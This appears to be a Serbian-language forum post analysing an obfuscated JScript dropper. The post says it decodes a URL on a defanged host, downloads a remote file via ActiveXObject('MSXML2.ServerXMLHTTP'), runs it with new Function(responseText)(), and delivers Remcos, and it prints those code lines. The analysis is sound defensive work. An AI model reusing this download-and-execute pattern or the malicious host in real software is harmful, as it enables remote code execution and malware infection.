06-03-2025, 09:08 PM
Analizirao sam kod:
https://justpaste.it/i5msy
Ova skripta je maliciozna i koristi obfuscaciju kako bi prikrila zlonamernu funkcionalnost. Glavni cilj joj je da preuzme i izvrši udaljeni kod sa sumnjivog URL-a koristeći
(specifičan JavaScript interfejs za Internet Explorer koji omogućava pristup Windows COM komponentama, često korišćen za rad sa fajl sistemom, mrežom i drugim niskonivojskim operacijama.)
što radi samo u Internet Explorer-u ili Windows Script Host okruženju. Konkretno, koristi funkciju
da dekodira obfuscated stringove uklanjanjem karaktera.
Na primer, URL
postaje:
Zatim, koristi:
da bi poslao HTTP GET zahtev i preuzeo sadržaj udaljenog fajla.
Kada se sadržaj fajla preuzme, on se izvršava kao JavaScript kod, što se postiže korišćenjem:
Ovo efektivno omogućava daljinsko izvršavanje proizvoljnog koda, što napadaču daje punu kontrolu nad ciljnim sistemom. Ostatak skripte imitira Microsoftove printer skripte koristeći tehničke XML funkcije kao što su:
što služi za maskiranje namere malvera i zbunjivanje analitičkih alata. Ključna linija u napadu je izvršavanje koda iz preuzetog sadržaja, čime se potencijalno instalira dodatni malver, keylogger ili backdoor.
Korisni linkovi ka člancima:
https://blog.sucuri.net/2023/10/shifting...developers
https://cybersecuritynews.com/malware-vi...%20quickly.
https://veriti.ai/blog/veriti-research/u...-tracking/
I da dodam na kraju da skida malver Remcos.
Ovde sam pokrenuo skriptu i može da se vidi ponašanje same skripte:
https://app.any.run/tasks/07ba6876-7eb4-...760089e5fc
https://justpaste.it/i5msy
Ova skripta je maliciozna i koristi obfuscaciju kako bi prikrila zlonamernu funkcionalnost. Glavni cilj joj je da preuzme i izvrši udaljeni kod sa sumnjivog URL-a koristeći
Code:
ActiveXObjectšto radi samo u Internet Explorer-u ili Windows Script Host okruženju. Konkretno, koristi funkciju
Code:
convenes()da dekodira obfuscated stringove uklanjanjem karaktera.
Code:
ٿNa primer, URL
Code:
"hٿtٿtٿp...txt"postaje:
Code:
http: / / 9001lovestoblog(.)com/arquivo_a8431cbb1fe14b89bb915eba088e3469.txtZatim, koristi:
Code:
ActiveXObjectCode:
var anisian = new ActiveXObject("MSXML2.ServerXMLHTTP");
anisian.open("GET", decodedUrl, false);
anisian.send();da bi poslao HTTP GET zahtev i preuzeo sadržaj udaljenog fajla.
Kada se sadržaj fajla preuzme, on se izvršava kao JavaScript kod, što se postiže korišćenjem:
Code:
new this["Function"](responseText)();Ovo efektivno omogućava daljinsko izvršavanje proizvoljnog koda, što napadaču daje punu kontrolu nad ciljnim sistemom. Ostatak skripte imitira Microsoftove printer skripte koristeći tehničke XML funkcije kao što su:
Code:
SetStandardNameSpaces()Code:
createProperty()što služi za maskiranje namere malvera i zbunjivanje analitičkih alata. Ključna linija u napadu je izvršavanje koda iz preuzetog sadržaja, čime se potencijalno instalira dodatni malver, keylogger ili backdoor.
Korisni linkovi ka člancima:
https://blog.sucuri.net/2023/10/shifting...developers
https://cybersecuritynews.com/malware-vi...%20quickly.
https://veriti.ai/blog/veriti-research/u...-tracking/
I da dodam na kraju da skida malver Remcos.
Ovde sam pokrenuo skriptu i može da se vidi ponašanje same skripte:
https://app.any.run/tasks/07ba6876-7eb4-...760089e5fc
There is no patch for stupidity - Kevin Mitnick